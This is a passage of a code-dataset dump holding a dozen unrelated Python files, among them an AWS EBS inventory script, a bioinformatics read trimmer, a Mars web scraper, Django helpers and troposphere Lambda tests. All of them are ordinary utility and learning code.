for i in range(2, n):\n        # See if i is prime\n        if not nonprimes[i]:\n            count += 1\n            # It is prime, so eliminate all of its\n            # multiples that cannot be prime\n            for j in range(2*i, n, i):\n                nonprimes[j] = True\n    # Print the elapsed time\n    stop = clock()\n    print(\"Count =\", count, \"Elapsed time:\", stop - start, \"seconds\")\ndef main():\n    count_primes(2000000)\n    seive(2000000)\nmain()\n","sub_path":"ch-9-List(md. borqat ali)/9.20.py","file_name":"9.20.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"62119514","text":"#!/bin/python\n#\n# Iterate all the instances within a specific region and identify\n# all attached EBS volumes. Record EBS volume information into\n# the 'Volume' (MySQL) database table.\n#\n#################################################################\nimport argparse\nimport boto3\nimport json\nimport subprocess\nfrom MothDBconnect import DbConnect, DbCnctInfo\n\n\n###################################################################\n# Get list of regions in service\n#    Need this for bounds-checking, but it's a Chicken/Egg problem:\n#    need AWS CLI config with default-region set\ndef ValidRegion():\n    regraw = subprocess.Popen(\n            \"aws ec2 describe-regions --query 'Regions[].RegionName[]' --out text\",\n            shell=True,\n            stdout=subprocess.PIPE).stdout.read()\n\n    return regraw.split( )\n\n#################################\n# Get list of instances in region\ndef GetInstances(args):\n\n    ec2 = session.resource(\n        'ec2',\n        region_name = args.region,\n        aws_access_key_id = args.key,\n        aws_secret_access_key = args.secret\n    )\n\n    instlist = []\n    for ret in ec2.instances.all():\n        instlist.append(ret._id)\n\n    return instlist\n\n###########################\n# Get EBS vols for instance\ndef GetEBSvolInfo(instid):\n\n    ec2 = session.resource('ec2')\n    inst = ec2.Instance(id=instid)\n    devstruct = inst.block_device_mappings\n\n    devmap = {}\n    for dev in devstruct:\n        devvolid = dev['Ebs']['VolumeId']\n        ebs = {}\n        ebs['Mount'] = dev['DeviceName']\n        ebs['Size'] = ec2.Volume(devvolid).size\n        ebs['Type'] = ec2.Volume(devvolid).volume_type\n        ebs['IOPS'] = ec2.Volume(devvolid).iops\n        ebs['AZ'] = ec2.Volume(devvolid).availability_zone\n        ebs['Tags'] = json.dumps(ec2.Volume(devvolid).tags)\n        devmap[devvolid] = ebs\n\n    return { instid : devmap }\n\n\n#################################\n# Insert EBS volume-info into SQL\ndef ebsMysql(insertData):\n    # dbconn = DbConnect(DbCnctInfo('testclt'))\n    # cursor = dbconn.cursor()\n\n    # Define INSERT-string to pass to MySQL\n    # and associated value-mapping \n    insert_struct = (\n        \"INSERT INTO Volume \"\n\t\"(\"\n\t  \"AccountId, \"\n          \"instanceId, \"\n          \"attachmentSet, \"\n          \"availabilityZone, \"\n          \"encrypted, \"\n          \"iops, \"\n          \"kmsKeyId, \"\n          \"size, \"\n          \"snapshotId, \"\n          \"status, \"\n          \"tagSet, \"\n          \"volumeId, \"\n          \"volumeType\"\n\t\") \"\n\t\"VALUES (\"\n\t  \"%(AccountId)s, \"\n          \"%(instanceId)s, \"\n          \"%(attachmentSet)s, \"\n          \"%(availabilityZone)s, \"\n          \"%(encrypted)s, \"\n          \"%(iops)s, \"\n          \"%(kmsKeyId)s, \"\n          \"%(size)s, \"\n          \"%(snapshotId)s, \"\n          \"%(status)s, \"\n          \"%(tagSet)s, \"\n          \"%(volumeId)s, \"\n          \"%(volumeType)s\"\n\t\"); \"\n    )\n\n    # Extract values from passed-EBS structure\n    instance = insertData.keys()[0]\n    for volume in insertData[instance]:\n        volMount = insertData[instance][volume]['Mount']\n        volIops = insertData[instance][volume]['IOPS']\n        if volIops is None:\n            volIops = 0\n        volType = insertData[instance][volume]['Type']\n        volSize = insertData[instance][volume]['Size']\n        volZone = insertData[instance][volume]['AZ']\n        volTags = 
insertData[instance][volume]['Tags']\n\n        # Define mappings to SQL-managed values\n        insert_data = {\n\t        'AccountId'\t\t: AWSaccount,\n                'instanceId'\t\t: instance,\n                'attachmentSet'\t\t: volMount,\n                'availabilityZone'\t: volZone,\n                'createTime'\t\t: '',\n                'encrypted'\t\t: '0',\n                'iops'\t\t\t: volIops,\n                'kmsKeyId'\t\t: '',\n                'size'\t\t\t: volSize,\n                'snapshotId'\t\t: '',\n                'status'\t\t: '',\n                'tagSet'\t\t: volTags,\n                'volumeId'\t\t: volume,\n                'volumeType'\t\t: volType\n\t    }\n\n        # Insert row into Volume table\n        print('Writing volume \\'%s\\' for instance \\'%s\\' to Volume table' % (volume, instance))\n        cursor.execute(insert_struct, insert_data)\n        dbconn.commit()\n\n\n############################\n# Commandline option-handler\nparseit = argparse.ArgumentParser()\n\nparseit.add_argument(\"-r\", \"--region\",\n                     choices = ValidRegion(),\n                     help=\"AWS Region\",\n                     required=True)\nparseit.add_argument(\"-k\", \"--key\",\n                     help=\"AWS access-key ID\")\nparseit.add_argument(\"-s\", \"--secret\",\n                     help=\"AWS access-key secret\")\nparseit.add_argument(\"-t\", \"--target-account\",\n                     help=\"AWS account to manage\",\n                     required=True)\n\n# Assign CLI argument-values to fetchable name-space\nargs = parseit.parse_args()\n\nAWSaccount = args.target_account\n\n# Initialize session/connection to AWS\nsession = boto3.Session(\n    region_name = args.region,\n    aws_access_key_id = args.key,\n    aws_secret_access_key = args.secret\n)\n\n# Initialize connection to MySQL\ndbconn = DbConnect(DbCnctInfo('testclt'))\ncursor = dbconn.cursor()\n\n# Create list of in-region instances to stop\nfor inst in GetInstances(args):\n    instVols = GetEBSvolInfo(inst)\n    ebsMysql(instVols)\n\n\n# Clean up connection to MySQL\ncursor.close()\ndbconn.close()\n","sub_path":"GetEBS.py","file_name":"GetEBS.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"16684615","text":"import bisect\n\ns = int(input())\nn = int(input())\n\ne = [False for i in range(0, s)]\nv = [int(input()) for i in range(0, n)]\nfor t in v:\n    if t < s:\n        e[t] = True\n\nv = sorted(v)\nz = [a + b for (a, b) in zip(v[0:n - 1], v[1:n])]\n\n\ndef solve(i):\n    r = s - v[i]\n    a = bisect.bisect_left(v, r - v[n - 1], lo=i + 1)\n    b = bisect.bisect_right(z, r, lo=a)\n    return [e[r - w] for w in v[a:b]].count(True)\n\nprint(sum([solve(i) for i in range(0, n - 2)]))\n","sub_path":"source/archives/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"569755206","text":"#kelly j 9-26-2020  learn together week 9, step 2.  setting upa virtual enviroment\n#I am gong to install into my virtual enviroment 2 libraries. beautifulsoup4 and lxml\n# so I can read a xml and print something from it.\n#I modifed code from this url  https://www.geeksforgeeks.org/reading-and-writing-xml-files-in-python/\n# to demostrate my virtual env.\n\nfrom bs4 import BeautifulSoup  \n\nwith open(\"h82sl_serviceConfig.xml\",\"r\") as myconfig:\n    myconfigData = myconfig.read()\n\n    config = BeautifulSoup(myconfigData,\"lxml\")\n\n    print(\" \")\n    theurl = config.find(\"hansen_url\")\n    thelogpath = config.find(\"hansen_logpath\")\n    print(theurl)\n    print(thelogpath)\n    # print(config.Hansen_URL)\n    # print(myconfigData)","sub_path":"w9/readaxml.py","file_name":"readaxml.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"578214217","text":"\n\nimport os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# This is so Django knows where to find stuff.\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"gerenciador.settings\")\nsys.path.append(BASE_DIR)\n# This is so my local_settings.py gets loaded.\nos.chdir(BASE_DIR)\n# This is so models get loaded.\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n\nfrom revisao_app.models import FlashCard, Materia\nfrom django.contrib.auth.models import User\nfrom django.contrib import admin\nfrom datetime import date, timedelta\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.cbook as cbook\nimport json\n\ndef calculoIdade(born):\n    today = date.today()\n    return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n\ndef getDate():\n    return date.today().strftime(\"%d/%m/%Y\")\n\ndef getDateVcto():\n    data_vencimento = date.today()\n    data_vencimento = data_vencimento.replace(year=data_vencimento.year+1)\n    return data_vencimento.strftime(\"%d/%m/%Y\")\n\ndef getDateProxRevisao(n_day,dataV):\n    data_vencimento = dataV\n    data_vencimento += timedelta(days=int(n_day))\n    print(data_vencimento,\"  \",n_day)\n    return data_vencimento\n\ndef dadosGrafico(listaStor):\n    _dados = {'date':[],'peso':[]}\n    for item in listaStor:\n        _dados['peso'].append(str(item.n_peso))\n        _dados['date'].append(str(item.data_registro))\n\n    return json.dumps(_dados)\n\ndef dadosGraficoAll(listaStor):\n    _dados = {'registro':[],'peso':[]}\n\n\n    for item in listaStor:\n        _dados['peso'].append(str(item.n_peso))\n        texto = item.numero_registro+' - '+str(item.tipo_animal)\n        _dados['registro'].append(texto)\n\n    return json.dumps(_dados)\n\n\n\ndef createOptionMateria(user):\n\n    materias = Materia.objects.filter(usuario=user)\n    lista1 = []\n    for materia in materias:\n        lista1.append((materia,materia))\n\n    mytuple = tuple(lista1)\n    return mytuple\n","sub_path":"revisao_app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"455167086","text":"from splinter import Browser\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport pandas as pd \r\n\r\n\r\ndef init_browser():\r\n    # @NOTE: Replace the path with your actual path to the chromedriver\r\n    executable_path = {'executable_path': 'chromedriver.exe'}\r\n    return Browser(\"chrome\", **executable_path, headless=False)\r\n\r\n\r\ndef scrape_info():\r\n    browser = init_browser()\r\n\r\n    # Visit visitcostarica.herokuapp.com\r\n    url = \"https://mars.nasa.gov/news/\"\r\n    browser.visit(url)\r\n\r\n    time.sleep(1)\r\n\r\n    # Scrape page into Soup\r\n    html = browser.html\r\n    soup = BeautifulSoup(html, \"html.parser\")\r\n    title = soup.find_all(\"div\", class_ = \"content_title\")\r\n    title_text = title[1].get_text()\r\n    paragraph = soup.find_all(\"div\", class_ = \"article_teaser_body\")\r\n    paragraph_text = paragraph[0].get_text()\r\n    url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\r\n    browser.visit(url)\r\n    image = browser.find_by_id(\"full_image\")\r\n    image.click()\r\n    info = browser.find_link_by_partial_text(\"more info\")\r\n    info.click()\r\n    html = browser.html\r\n    soup = BeautifulSoup(html, 'html.parser')\r\n    image = soup.select_one(\"figure.lede a img\")\r\n    src = image.get('src')\r\n    url = 'https://www.jpl.nasa.gov'\r\n    src = url + src\r\n    mars_scrape = pd.read_html(\"https://space-facts.com/mars/\")\r\n    mars_table = mars_scrape[0]\r\n    mars_html = mars_table.to_html()\r\n    url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\r\n    browser.visit(url)\r\n    links = browser.find_by_css(\"a.product-item h3\") \r\n    j= 0\r\n    images = []\r\n    for i in links:\r\n        browser.find_by_css(\"a.product-item h3\")[j].click()\r\n        link = browser.find_link_by_text(\"Sample\").first[\"href\"]\r\n        images.append(link)\r\n        j = j+1\r\n        browser.back()\r\n    print(src)\r\n\r\n    # Store data in a dictionary\r\n    mars_data = {\r\n        \"title\": title_text,\r\n        \"paragraph\": paragraph_text,\r\n        \"image\": src,\r\n        \"table\": mars_html,\r\n        \"images\": images\r\n    }\r\n\r\n    # Close the browser after scraping\r\n    browser.quit()\r\n\r\n    # Return results\r\n    return mars_data\r\n","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"602466581","text":"import os,sys,math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nos.chdir('C:\\\\Users\\\\Apoorva Lal\\\\Desktop\\\\Research\\\\temp')\n\nimport json\nfrom collections import defaultdict, Counter\npath = 'C:/Users/Apoorva Lal/Desktop/Research/github_forks/pydata-book/ch02/usagov_bitly_data2012-03-16-1331923249.txt'\nrecords = [json.loads(line) for line in open(path)]           \ntime_zones = [rec['tz'] for rec in records if 'tz' in rec]\ntime_zones\n\ndef get_counts(sequence):\n    counts = defaultdict(int) # values will initialize to 0\n    for x in sequence:\n        counts[x] += 1\n    return counts\n    \ncounts = get_counts(time_zones)    \n\ndef top_counts(count_dict, n=10):\n    value_key_pairs = [(count, tz) for tz, count in count_dict.items()]\n    value_key_pairs.sort()\n    return value_key_pairs[-n:]\n\ntop_counts(counts)\n\ncounts = Counter(time_zones)\ncounts.most_common(10)\n\nframe = pd.DataFrame(records)\n\nframe['tz'][:10]\ntz_counts = frame['tz'].value_counts()\n\nclean_tz = frame['tz'].fillna('Missing')\nclean_tz[clean_tz == ''] = 'Unknown'\ntz_counts = clean_tz.value_counts()\n\ntz_counts[:10].plot(kind='barh', rot=0)\n\nresults = pd.Series([x.split()[0] for x in frame.a.dropna()])\n\nresults.value_counts()[:8]\n\ncframe = frame[frame.a.notnull()]\noperating_system = np.where(cframe['a'].str.contains('Windows'),\n 'Windows', 'Not Windows')\n\noperating_system[:5]\nby_tz_os = cframe.groupby(['tz', operating_system])\nagg_counts = by_tz_os.size().unstack().fillna(0)\nagg_counts\nindexer = agg_counts.sum(1).argsort()\nindexer[:10]\n\ncount_subset = agg_counts.take(indexer)[-10:]\ncount_subset.plot(kind='barh', stacked=True)\nplt.show() \n\n\n\n\n","sub_path":"mckinney_book.py","file_name":"mckinney_book.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"164113992","text":"from __future__ import barry_as_FLUFL\n\n__all__ = ['read1', 'read2', 'trimmed1', 'un_trimmed1', 'trimmed2', 'un_trimmed2', 'min_read_len',\n           'common_seq1', 'common_seq2', 'stats_file', 'logger_trim_process', 'logger_trim_errors']\n__version__ = '1.0'\n__author__ = 'Maggie Ruimin Sun'\n\nimport logging\nimport os\nimport re\nimport sys\nimport time\nimport gzip\nimport itertools\nimport shlex\nimport subprocess\nimport numpy\n\nsys.path.append(\"..\")\nfrom pipelines.log.log_v1 import store_trim_logs\n\n\nbase_paired = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n#--\ndef reverse_complement(seq):\n    revseqlist = reversed(seq)\n    revcomseqlist = [base_paired[k] for k in revseqlist]\n    revcomseq = ''.join(revcomseqlist)\n    return revcomseq\n\n# put the info output to the log\ndef stdout_err(command):\n    command_pope = shlex.split(command)\n    child = subprocess.Popen(command_pope, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n    stdout, stderr = child.communicate()\n    child.wait()\n    return stdout, stderr\n\n\n# ----------------------------------------------------------\ndef read_fq(file_name, logger_trim_process, logger_trim_errors):\n    if not os.path.isfile(file_name):\n        logger_trim_errors.error(\"%s does not exist!\\n\", file_name)\n        print(file_name + ' does not exist!')\n    if re.search('.gz$', file_name):\n        fastq = gzip.open(file_name, 'r')\n    else:\n        fastq = open(file_name)\n\n    with fastq as f:\n        while True:\n            l1 = str(f.readline(), 'utf-8')\n            if not l1:\n                break\n            l2 = str(f.readline(), 'utf-8')\n            l3 = str(f.readline(), 'utf-8')\n            l4 = str(f.readline(), 'utf-8')\n            yield [l1, l2, l3, l4]\n\n\ndef trim_read1(r1, common_seq2, mt_barcode):\n    l1 = len(r1[1].strip())\n    r1_end3 = r1[1].strip()[(l1 - 23):]\n    # trim_seq = common_seq2 + mt_barcode\n    trim_seq = reverse_complement(common_seq2 + mt_barcode)\n    for i in range(23):\n        if r1_end3[i:] == trim_seq[0:(23 - i)]:\n            break\n    pos_trim_r1 = l1 - 23 + i\n    return pos_trim_r1, [r1[0], r1[1].strip()[0:pos_trim_r1] + '\\n', r1[2], r1[3].strip()[0:pos_trim_r1] + '\\n']\n\n\ndef trim_read2(r2, common_seq1):\n    l2 = len(r2[1].strip())\n    r2_end3 = r2[1].strip()[(l2 - 21):]\n    for i in range(21):\n        if r2_end3[i:] == common_seq1[0:(21 - i)]:\n            break\n    pos_trim_r2 = l2 - 21 + i\n    return pos_trim_r2, [r2[0], r2[1].strip()[0:pos_trim_r2] + '\\n', r2[2], r2[3].strip()[0:pos_trim_r2] + '\\n']\n\n\ndef trim_read_pairs(read1, read2, trimmed1, trimmed2, min_read_len, common_seq1,\n                    common_seq2, stats_file, logger_trim_process, logger_trim_errors):\n    time_start = time.time()\n    num_total_reads = 0\n    num_short_reads = 0\n    num_error_reads1 = 0\n    num_error_reads2 = 0\n    fout1 = open(trimmed1, 'w')\n    fout2 = open(trimmed2, 'w')\n    # fout_umi = open(trimmed2 + '.umi.fq', 'w')\n    for r1, r2 in zip(read_fq(read1, logger_trim_process, logger_trim_errors),\n                      read_fq(read2, logger_trim_process, logger_trim_errors)):\n        num_total_reads += 1\n        if r1[0][0] != '@' or r2[0][0] != '@':\n            num_error_reads1 += 1\n            store_trim_logs('null', logger_trim_errors,\n                            \"Error read pair: \\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n        else:\n            start_common = 
r2[1].find(common_seq2)\n            if start_common < 12:\n                num_error_reads2 += 1\n                store_trim_logs('null', logger_trim_errors,\n                                \"Error barcode/common seqs:\" + str(start_common)\n                                + \"\\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n            else:\n                umi = r2[1][(start_common - 12):start_common]\n                qua = r2[3][(start_common - 12):start_common]\n                # delete umi with low base quality \n                quanum = list(map(ord, qua))\n                quanum = [i - 33 for i in quanum]\n                # if the median base quality is bigger than Q20 \n                if numpy.median(quanum) < 20 :\n                    num_error_reads2 += 1\n                    store_trim_logs('null', logger_trim_errors,\n                                \"Error barcode/common seqs:\" + str(start_common)\n                                + \"\\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n                else:\n                    r2[1] = r2[1][(start_common + 11):]\n                    r2[3] = r2[3][(start_common + 11):]\n                    pos_trim_r1, r1 = trim_read1(r1, common_seq2, umi)\n                    pos_trim_r2, r2 = trim_read2(r2, common_seq1)\n                    if pos_trim_r1 < min_read_len or pos_trim_r2 < min_read_len:\n                        num_short_reads += 1\n                        store_trim_logs('null', logger_trim_errors,\n                                    \"Short read pair: \\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n                    else:\n                        h1 = r1[0].split(' ')[0] + '_' + umi + ' ' + r1[0].split(' ')[1]\n                        h2 = r2[0].split(' ')[0] + '_' + umi + ' ' + r2[0].split(' ')[1]\n                        fout1.write(h1 + r1[1] + r1[2] + r1[3])\n                        fout2.write(h2 + r2[1] + r2[2] + r2[3])\n                    #h1 = r1[0].split(' ')[0] + '_' + umi + ' ' + r1[0].split(' ')[1]\n                    #h2 = r2[0].split(' ')[0] + '_' + umi + ' ' + r2[0].split(' ')[1]\n                    #fout1.write(h1 + r1[1] + r1[2] + r1[3])\n                    #fout2.write(h2 + r2[1] + r2[2] + r2[3])\n                    #quanum = list(map(ord, qua))\n                    #quanum = [i - 33 for i in quanum]\n                    #quanumstr = '\\t'.join(list(map(str, quanum)))\n                    #fout_umi.write(''.join([r1[0].split(' ')[0], '_', umi, '\\t', umi, '\\t', quanumstr, '\\n']))\n                    #fout_umi.write(h2 + umi + '\\n' +  '+\\n' + qua + '\\n')\n    fout1.close()\n    fout2.close()\n    # fout_umi.close()\n    stats_out = open(stats_file, 'w')\n    stats_out.write('Total number of reads == ' + str(num_total_reads) + '\\n')\n    stats_out.write('Number of short reads (either read_length <{0}bp) == {1}\\n'.format(\n        min_read_len, num_short_reads))\n    stats_out.write('Number of unproper read pairs (containing incorrect headers) == ' + str(num_error_reads1) + '\\n')\n    stats_out.write('Number of read pairs without correct common sequences/MTs == ' + str(num_error_reads2) + '\\n')\n    stats_out.write('The time of trimming is %s minutes.' 
% str((time.time() - time_start) / 60))\n    stats_out.close()\n\n\ndef trim_read_pairs_by_trimmomatic(trimmomatic_dir,\n                                   read1, read2, \n                                   trimmed1, un_trimmed1,\n                                   trimmed2, un_trimmed2,\n                                   min_read_len,\n                                   stats_file, logger_trim_process,\n                                   logger_trim_errors):\n    if not os.path.isfile(read1):\n        store_trim_logs(logger_trim_process,'null', read1 + ' does not exist!' + '\\n')\n        store_trim_logs(logger_trim_process,'null', 'Error: cannot find NGS read file!' + '\\n')\n        exit()\n    if not os.path.isfile(trimmomatic_dir):\n        store_trim_logs(logger_trim_process,'null', trimmomatic_dir + ' does not exist!' + '\\n')\n        store_trim_logs(logger_trim_process,'null', 'Error: cannot find trimmomatic.jar!' + '\\n')\n        exit()\n    command = 'java -jar {0} PE -threads 1 -phred33 -summary {1} {2} {3} {4} {5} {6} {7} ' \\\n              'ILLUMINACLIP:{8}:2:30:10 LEADING:5 TRAILING:5 SLIDINGWINDOW:4:20 MINLEN:{9} '.format(\n        trimmomatic_dir, stats_file, read1, read2, trimmed1, un_trimmed1, trimmed2, un_trimmed2,\n        os.path.dirname(trimmomatic_dir) + '/adapters/TruSeq3-PE.fa', min_read_len)\n    stdout, stderr = stdout_err(command)\n    store_trim_logs(logger_trim_process, 'null', stdout)\n    store_trim_logs('null', logger_trim_errors, stderr)\n","sub_path":"pipelines/trim/trim_reads_v1.py","file_name":"trim_reads_v1.py","file_ext":"py","file_size_in_byte":8029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"196773624","text":"def max_even_seq(n):\n    tempEven = 0  # will be used to save the length new sequence while iterating\n    longstEven = 0  # the length longest even sequence untill now\n    for i in str(n):  # iterating (n) as a string\n        if int(i) % 2 == 0:  # checks if the cuurent number is even\n            tempEven += 1  # counts the lengh of the current seque\n        elif tempEven != 0:  # if the number is odd, and tempEven is not = 0, then tempEven = 0.\n            tempEven = 0\n        if tempEven > longstEven:  # if a longer sequence is found, it's length is saved\n            longstEven = tempEven\n    return longstEven\n\n\n","sub_path":"max_even_seq/subs/2017B/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"24955808","text":"import unittest\nfrom troposphere import GetAtt, Template, Join\nfrom troposphere.awslambda import Code, Function\n\n\nclass TestAWSLambda(unittest.TestCase):\n    def test_exclusive(self):\n        lambda_func = Function(\n            \"AMIIDLookup\",\n            Handler=\"index.handler\",\n            Role=GetAtt(\"LambdaExecutionRole\", \"Arn\"),\n            Code=Code(\n                S3Bucket=\"lambda-functions\",\n                S3Key=\"amilookup.zip\",\n            ),\n            Runtime=\"nodejs\",\n            Timeout=\"25\",\n        )\n        t = Template()\n        t.add_resource(lambda_func)\n        t.to_json()\n\n    def test_zip_file(self):\n        lambda_func = Function(\n            \"AMIIDLookup\",\n            Handler=\"index.handler\",\n            Role=GetAtt(\"LambdaExecutionRole\", \"Arn\"),\n            Code=Code(\n                ZipFile=Join(\"\", [\n                    \"var response = require('cfn-response');\",\n                    \"exports.handler = function(event, context) {\",\n                    \"  var input = parseInt(event.ResourceProperties.Input);\",\n                    \"  var responseData = {Value: input * 5};\",\n                    \"  response.send(\"\n                    \"    event, context, response.SUCCESS, responseData\"\n                    \"  );\",\n                    \"};\"\n                ]),\n            ),\n            Runtime=\"nodejs\",\n            Timeout=\"25\",\n        )\n        t = Template()\n        t.add_resource(lambda_func)\n        t.to_json()\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_awslambda.py","file_name":"test_awslambda.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"589498222","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle as pkl\nfrom .smit import SimIter\n\nrs = []\ntime = np.array(0)\npos = np.array(0.3)\nvel = np.array(0)\nsm = SimIter()\nfor r in sm:\n    rs.append(r)\n    print('Altitude: {:.3f} Velocity: {:.3f} Time: {:.1f}'.format(r.position, r.velocity, sm.envstate.time))\n    time = np.append(time, sm.envstate.time)\n    pos = np.append(pos, r.position)\n    vel = np.append(vel, r.velocity)\nplt.figure(1)\nplt.plot(time, pos, '.')\nplt.plot(time, vel, '.')\nplt.xlabel('Time (s)')\nplt.ylabel('Altitude (m)')\nplt.title('1 DOF Rocket Simulation')\nplt.show()\ninput()\n\npkl.dump(rs, open(\"firstrun.pkl\", \"wb\"))\n","sub_path":"simulator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"341010425","text":"'''\nSome auxiliary functions to check on, and run jellyfish\n'''\n\nimport distutils.version\nimport os\nimport shlex\nimport subprocess\nimport sys\nimport pandas\nimport numpy as np\nimport progressbar\n\njellyfish_min_version = \"2.2.4\"\n\nbar = progressbar.ProgressBar()\n\ndef run(cmd):\n    '''\n    Process generator\n    '''\n    print(\"Running: {}\".format(cmd), file = sys.stderr)\n    #p = subprocess.Popen(shlex.split(cmd), stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n    #out, err = p.communicate()\n    p = subprocess.check_call(cmd, shell = True)\n    return 0\n\ndef read_table(sample_id, make_binary = True):\n    '''\n    Quickly read a table of kmer counts\n\n    With make_binary, the output is always 0,1. But that can change later\n    '''\n    tab = pandas.read_csv(\"{}.txt\".format(sample_id), delimiter = '\\t', names = ['kmer', '{}'.format(sample_id)])\n    if make_binary:\n        tab[sample_id] = np.where(tab[sample_id] > 0, 1, 0)\n    return tab\n\ndef join_tables(master, new_table, on):\n    '''\n    Quickly join two tables on column ON\n    '''\n    return pandas.merge(master, new_table, on = on, sort = False)\n\ndef find_var_rows(row):\n    return np.count_nonzero(row) < len(row)\n\nclass JellyFish:\n    def __init__(self, force = False):\n        self.cmd = ''\n        self.version = ''\n        self.force = force\n    def exists(self):\n        try:\n            p = subprocess.Popen(shlex.split('jellyfish --version'), stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n            out,err = p.communicate()\n            cmd,version = out.split()\n            self.cmd = cmd.decode()\n            self.version = version.decode()\n            if distutils.version.LooseVersion(self.version) >= distutils.version.LooseVersion(jellyfish_min_version):\n                print(\"Found jellyfish version {}.... OK!\".format(self.version))\n            else:\n                raise ValueError(\"Version of jellyfish found is less than {}, please update to run dingo\".format(min_version))\n        except ValueError:\n            print(\"Did not find jellyfish on the path.\")\n    def __build_input(self, path, clear = False):\n        if clear:\n            gen = open(\"generator.txt\", 'w')\n        else:\n            gen = open(\"generator.txt\", 'a')\n        path = os.path.abspath(path)\n        if path.endswith('.gz'):\n            gen.write(\"gunzip -c {}\\n\".format(path))\n        else:\n            gen.write(\"cat {}\\n\".format(path))\n        gen.close()\n        return\n    def count_all_mers(self, tab, ksize, hash_size, threads = 16, output_file = 'allcount', min_number = 10, simult_read = 2, n_bytes = 1):\n        cmd = self.cmd + ' count -s {} -m {} -G {} --out-counter-len {} -C -L {} -o {} -g {} -t {}'.format(hash_size, ksize, simult_read, n_bytes, min_number, output_file, 'generator.txt', threads)\n        for s in tab:\n            self.__build_input(s[3])\n        p = run(cmd)\n        cmd = self.cmd + ' dump -o {0}.fa {0}'.format(output_file)\n        p = run(cmd)\n    def count_ind_mers(self, tab, ksize, hash_size, threads = 16, infile = 'allcount.fa', min_number = 10, simult_read = 2, n_bytes = 1):\n        for s in bar(tab):\n            output_file = s[0]\n            if os.path.exists(\"{}.txt\".format(output_file)) and not self.force:\n                print(\"File {}.txt already exists... 
Skipping kmer counting!\".format(output_file))\n            else:\n                self.__build_input(s[3], clear = True)\n                cmd = self.cmd + ' count -s {} -m {} -G {} --out-counter-len {} -C -o {}.jf --if {} -g {} -t {}'.format(hash_size, ksize, simult_read, n_bytes, output_file, infile, \"generator.txt\", threads)\n                p = run(cmd)\n                cmd = self.cmd + ' dump -ct -o {0}.txt {0}.jf'.format(output_file)\n                p = run(cmd)\n    def join_counts(self, tab, pickle = True):\n        master = read_table(tab[0][0])\n        for s in tab[1:]:\n            master = join_tables(master, read_table(s[0]), on = 'kmer')\n        master = master.loc[master.apply(find_var_rows, axis = 1),] # remove kmers present in all samples\n        master = master.transpose()\n        print(\"Found {} variable kmers.\".format(master.shape[1]), file = sys.stderr)\n        if pickle:\n            master.to_pickle(\".kmer_table.pickle\")\n        master = master.values\n        return [master[1:], master[0]]\n    def load_kmertable(self, pickle_file = \".kmer_table.pickle\"):\n        master = pandas.read_pickle(pickle_file)\n        master = master.values\n        return [master[1:], master[0]]\n","sub_path":"dingo/jellyfish.py","file_name":"jellyfish.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"297751251","text":"import http.client\n\n\ndef main():\n    try:\n        connection = http.client.HTTPConnection('127.0.0.1', '6002')\n        connection.request('GET', '/')\n    except ConnectionRefusedError as e:\n        print(str.format('[#] <{}> exception: {}', type(e), e))\n\n    print(str.format('[*] {}', issubclass(ConnectionRefusedError, OSError)))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"spl/http_package/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
